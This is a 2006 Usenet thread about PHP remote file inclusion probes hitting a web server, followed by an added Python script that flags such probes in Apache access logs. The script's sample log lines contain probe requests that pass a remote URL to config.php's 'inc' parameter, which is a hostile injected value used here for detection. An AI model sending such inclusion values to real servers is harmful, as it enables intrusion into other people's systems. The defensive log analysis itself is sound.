Posted by Ignoramus6539 on 08/30/06 19:47
On Wed, 30 Aug 2006 19:45:54 GMT, Colin McKinnon <colin.thisisnotmysurname@ntlworld.deletemeunlessURaBot.com> wrote:
> Ignoramus6539 wrote:
>
>> There were some strange requests to my server asking for config.php
>> file (which I do not have in the requested location).
>>
>
> Nice one Ignoramus6539
>
>> I did some investigation. Seems to be a virus written in perl,
>> exploiting a vulnerability in php code.
>>
>
> Sure looks like it. Is anyone daft enough to include($get_parameter)?
I think that the get parameter was mentioned in the access_log line.
>> I did a locate command on my fedora systems and found config.php in
>> some package called 'squirrelmail'. Which I immediately deleted, even
>> though it was not accessible through the web, just sitting there, but
>> I just do not want it.
>>
> Oooh. "Some package called..." sloppy housekeeping!
Yep. Point taken.
> Actually, although Squirrelmail was vulnerable to this kind of attack
> (http://www.sans.org/resources/malwarefaq/squirrelmail.php?portal=750dd8d47b2e376b3699d19913a177c2,
> http://www.idefense.com/intelligence/vulnerabilities/display.php?id=191)
> the developers are relatively good about releasing fixes.
>
> Your attacker seems to be looking for phpListPro
> (http://www.frsirt.com/english/advisories/2006/1325).
>
> Usually script kiddies don't look to see what you're running before
> unleashing all their dogs on your servers.
Absolutely. They probably googled for some keywords on phpListPro and
found them under /algebra/about/history/ directory.
>> My main question is, just what package or program owns config.php that
>> is vulnerable. It is a generic file name, so I would not be so quick
>> to suspect squirrelmail.
>>
> Next time try Google first :) and give us a URL for the code.
Well, I thought that the URLs might disappear soon. If you would like
me to place code on my own webpage, I will be glad to do so.
i
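The probes discussed in this thread (config.php requested with a GET parameter pointing at a remote URL, the shape an `include($get_parameter)` bug is exploited by) can be picked out of an Apache access_log mechanically. The script below is an added example, not code from the thread; the log lines, the parameter name `inc` and the addresses are constructed placeholders.

```python
import re
from urllib.parse import urlparse, parse_qs

# Apache "combined" log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http", "https", "ftp")

# Constructed sample lines (not from the thread). The first two show the probe
# pattern: config.php requested with a GET parameter (placeholder name "inc")
# whose value is a remote URL, which a script doing include($_GET['inc']) would
# fetch and execute. The third line is a benign request for comparison.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Aug/2006:19:40:12 +0000] "GET /algebra/about/history/config.php?inc=http://203.0.113.9/t.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
203.0.113.7 - - [30/Aug/2006:19:40:13 +0000] "GET /config.php?inc=http://203.0.113.9/t.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
198.51.100.4 - - [30/Aug/2006:19:41:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

def find_rfi_probes(log_text):
    """Return one finding per request whose query string carries a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than crash on a real log
        parsed = urlparse(m.group("target"))
        for name, values in parse_qs(parsed.query, keep_blank_values=True).items():
            for value in values:
                v = urlparse(value)
                if v.scheme in REMOTE_SCHEMES and v.netloc:
                    findings.append({
                        "ip": m.group("ip"),
                        "status": int(m.group("status")),
                        "script": parsed.path.rsplit("/", 1)[-1],
                        "param": name,
                        "remote": value,
                    })
    return findings

def probing_ips(findings):
    """Count remote-include probes per source address, most active first."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: -kv[1])

if __name__ == "__main__":
    hits = find_rfi_probes(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]} -> {h["script"]} param={h["param"]} remote={h["remote"]} ({h["status"]})')
    print(probing_ips(hits))
```

A 404 on these lines is the good outcome (the file is not there), but the source addresses and the path they guessed are still worth keeping, since the same scanner will try every other known-vulnerable script name next.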